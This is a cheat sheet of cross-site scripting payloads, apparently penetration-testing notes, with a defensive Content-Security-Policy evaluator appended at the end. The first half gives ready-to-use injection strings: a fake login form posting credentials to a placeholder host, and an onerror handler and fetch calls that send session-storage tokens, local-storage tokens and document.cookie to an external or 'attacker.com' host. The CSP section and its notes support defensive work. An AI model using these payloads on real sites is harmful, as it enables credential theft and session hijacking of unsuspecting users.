Cross-Site Scripting Inspirations

Injection of a Login Page:

This creates a fake login form. Change the <URL> parameter to your collaborator/externally facing domain.

<form action="https://<URL>/POC" method="post"><label for="username">Username:</label><input type="text" id="username" name="username" required><br><br><label for="password">Password:</label><input type="password" id="password" name="password" required><br><br><button type="button" style="height:40px;font-size:13pt;">Login</button></form>

Session Hijacking - Stealing Local/Session Storage

This payload steals a session token from Session Storage; the same can be done for Local Storage using JavaScript. The payload below reads the Session Storage item (named access_token here; change it to suit your needs) and sends it to the collaborator via a GET request. Be sure to replace <URL> with your collaborator/externally facing domain.

<img src="1" onerror="var xhr= new XMLHttpRequest(); xhr.open('GET', 'https://<URL>?token='+window.sessionStorage.getItem('access_token')); xhr.send();" />

It is important that mode: 'no-cors' is set on the request. This variant steals access_token from Local Storage and sends it to the collaborator.

fetch('https://attacker.com', {
  method: 'POST',
  mode: 'no-cors',
  body:localStorage.getItem('access_token')
});

Session Hijacking - Stealing Cookies

Stealing cookies (such as the session cookie) is a simple JavaScript payload. Change <DOMAIN> to your collaborator domain.

fetch(`https://<DOMAIN>/?cookies=${encodeURIComponent(document.cookie)}`)
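As an added defensive example (not part of these notes), the following JavaScript is a small, simplified Content-Security-Policy source-list evaluator used to confirm that a hardened policy closes all three exfiltration channels used above: the fake form's POST (form-action), the XHR/fetch of a storage token and the cookie fetch (both connect-src). The app origin app.example, the collaborator host collab.example and the function names cspAllows/exfilBlocked are assumptions.

```javascript
// Added example (not from the original notes): minimal CSP source-list evaluator.
// Simplified: handles 'self', 'none', '*', scheme sources, host sources (optional *.)
// and the default-src fallback; app.example / collab.example are constructed names.
const PAGE_ORIGIN = 'https://app.example'; // constructed origin of the vulnerable app

// Fetch directives fall back to default-src when absent; form-action does not.
const FALLS_BACK_TO_DEFAULT = new Set(['connect-src', 'img-src', 'script-src']);

function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

function sourceMatches(src, url, pageOrigin) {
  if (src === "'none'") return false;
  if (src === "'self'") return url.origin === pageOrigin;
  if (src === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(src)) return url.protocol === src.toLowerCase(); // e.g. https:
  // Host source such as https://api.example or *.example (port and path ignored here).
  const host = src.replace(/^[a-z][a-z0-9+.-]*:\/\//i, '').split('/')[0].split(':')[0].toLowerCase();
  return host.startsWith('*.') ? url.hostname.endsWith(host.slice(1)) : url.hostname === host;
}

// True when a request to `target` governed by `directive` is allowed by `header`.
function cspAllows(header, directive, target, pageOrigin = PAGE_ORIGIN) {
  const policy = parseCsp(header);
  let sources = policy.get(directive);
  if (sources === undefined && FALLS_BACK_TO_DEFAULT.has(directive)) sources = policy.get('default-src');
  if (sources === undefined) return true; // directive not governed: browser allows it
  return sources.some((s) => sourceMatches(s, new URL(target), pageOrigin));
}

// Policy a defender would ship; each exfil channel above maps to one directive.
const HARDENED_CSP = "default-src 'self'; script-src 'self'; connect-src 'self'; form-action 'self'";
const EXFIL_CHANNELS = [
  ['form-action', 'https://collab.example/POC'],        // injected login form POST
  ['connect-src', 'https://collab.example/?token=x'],   // XHR / fetch of the storage token
  ['connect-src', 'https://collab.example/?cookies=x'], // fetch of document.cookie
];

function exfilBlocked(header = HARDENED_CSP) {
  return EXFIL_CHANNELS.every(([directive, url]) => !cspAllows(header, directive, url));
}
```

Note that form-action does not inherit from default-src, so a policy with only default-src 'self' still lets the injected form post elsewhere, and leaving 'unsafe-inline' out of script-src stops the inline onerror handler from running at all. Marking the session cookie HttpOnly keeps document.cookie from exposing it regardless of CSP.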